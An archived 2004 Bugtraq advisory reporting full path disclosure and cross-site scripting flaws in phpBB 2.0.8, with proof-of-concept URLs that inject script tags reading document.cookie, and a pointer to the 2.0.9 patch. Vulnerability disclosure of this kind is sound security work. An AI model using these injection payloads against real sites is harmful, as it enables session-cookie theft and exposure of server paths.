lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040716142242.20428.qmail@www.securityfocus.com>
Date: 16 Jul 2004 14:22:42 -0000
From: Janek Vind <come2waraxe@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [waraxe-2004-SA#034 - XSS and path full path disclosure in PhpBB
    2.0.8]






{================================================================================}
{                              [waraxe-2004-SA#034]                              }
{================================================================================}
{                                                                                }
{                 [ XSS and full path disclosure in PhpBB 2.0.8 ]                }
{                                                                                }
{================================================================================}
                                                                                                                                
Author: Janek Vind "waraxe"
Date: 16. July 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=34


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB is widely used and very popular forum software, written in php.

Homepage: http://www.phpbb.com/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There are some uninitialized arrays in phpBB code, which can lead to XSS and full
path disclosure. "register_globals" must be enabled on server for those bugs to be
exploitable.


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "index.php":

http://localhost/phpbb208/index.php?category_rows=waraxe

Fatal error: [] operator not supported for strings in 
D:\apache_wwwroot\phpbb208\index.php on line 120


A2 - full path disclosure in "language\lang_english\lang_faq.php":

http://localhost/phpbb208/faq.php?faq=waraxe

Fatal error: [] operator not supported for strings in 
D:\apache_wwwroot\phpbb208\language\lang_english\lang_faq.php on line 41


A3 - full path disclosure in "language\lang_english\lang_bbcode.php ":

http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe

Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\language\lang_english\lang_bbcode.php on line 46


A4 - full path disclosure in "includes\usercp_viewprofile.php":

http://localhost/phpbb208/profile.php?mode=viewprofile&u=2&ranksrow=waraxe

Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\includes\usercp_viewprofile.php on line 46



B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B1 - XSS in "index.php":

http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&category_rows[0][cat_title]=waraxe&lt;script&gt;alert(document.cookie);&lt;/script&gt;
&category_rows[0][cat_order]=99


B2 - XSS in "language\lang_english\lang_faq.php":

http://localhost/phpbb208/faq.php?
faq[0][0]=f00&lt;script&gt;alert(document.cookie);&lt;/script&gt;bar&faq[0][1]=waraxe


B3 - XSS in "language\lang_english\lang_bbcode.php ":

http://localhost/phpbb208/faq.php?mode=bbcode&
faq[0][0]=f00&lt;script&gt;alert(document.cookie);&lt;/script&gt;bar&faq[0][1]=waraxe



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected versions are 2.0.8 and probaly older 2.x versions too.
Vendor has released new version - 2.0.9 - which is patched against discussed
bugs and contain many other improvements.

phpBB 2.0.9 packages can be downloaded at:

http://www.phpbb.com/downloads.php

Additional information and discussion at waraxe forum:

http://www.waraxe.us/forums.html



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix and slimjim100!
Tervitused - Heintz ja Maku!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ